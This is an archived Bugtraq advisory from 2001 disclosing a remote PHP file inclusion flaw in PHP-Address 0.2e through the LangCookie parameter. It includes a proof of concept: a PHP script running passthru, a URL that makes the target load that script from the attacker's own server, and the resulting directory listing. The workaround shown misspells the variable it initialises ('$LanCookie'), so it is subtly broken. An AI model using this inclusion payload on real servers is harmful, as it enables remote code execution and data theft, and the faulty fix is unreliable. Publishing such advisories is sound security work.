Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP source injection in PHPAddress
From: "tim vandermeersch" <tim.vandermeersch () pandora be>
Date: Wed, 26 Dec 2001 05:19:11 +0100

PHP source injection in PHPAddress

Description

PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaing a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/

Workaround

Change the global.php3 file so it looks like this:
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch
(chu () informatik tu-chemnitz de)
$LanCookie = "";      // THIS LINE
if ($LangCookie)
  require("$LangCookie.php3");  // Line 5
...

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests an url like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE"; is
able to include any file he wants.

Example

I putted a PHP script on my server wich I wanted to include:

------------x.php3------------
<?
    passthru("/bin/ls /");
?>
-------------------------------

then i requested this url:
http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is allready there look at line 5 in global.php3)

------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var
------------------------------

Note that any PHP code could be included, malicious users could get access
to database
passwords, personal information, ...

------------------------------
Tim Vandermeersch
Tim.Vandermeersch () pandora be



  By Date           By Thread  

Current thread:
  • PHP source injection in PHPAddress tim vandermeersch (Jun 17)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]